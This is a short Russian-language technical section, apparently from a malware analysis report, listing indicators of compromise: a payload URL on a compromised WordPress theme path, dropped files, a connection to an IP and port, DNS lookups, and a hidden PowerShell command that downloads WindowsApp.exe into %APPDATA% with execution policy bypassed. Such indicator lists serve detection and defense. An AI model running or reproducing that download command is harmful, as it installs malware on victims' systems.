Техническая информация
- http://mi###ihara.com//wp-content/themes/gaukingo/windowsapp.exe как %appdata%\windowsapp.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\windowsapp.exe
- '21#.#70.126.139':4660
- http://mi###ihara.com//wp-content/themes/gaukingo/WindowsApp.exe
- DNS ASK mi###ihara.com
- DNS ASK pa###bin.com
- '%APPDATA%\windowsapp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mi###ihara.com//wp-content/themes/gaukingo/WindowsApp.exe','%APPDATA%\...' (со скрытым окном)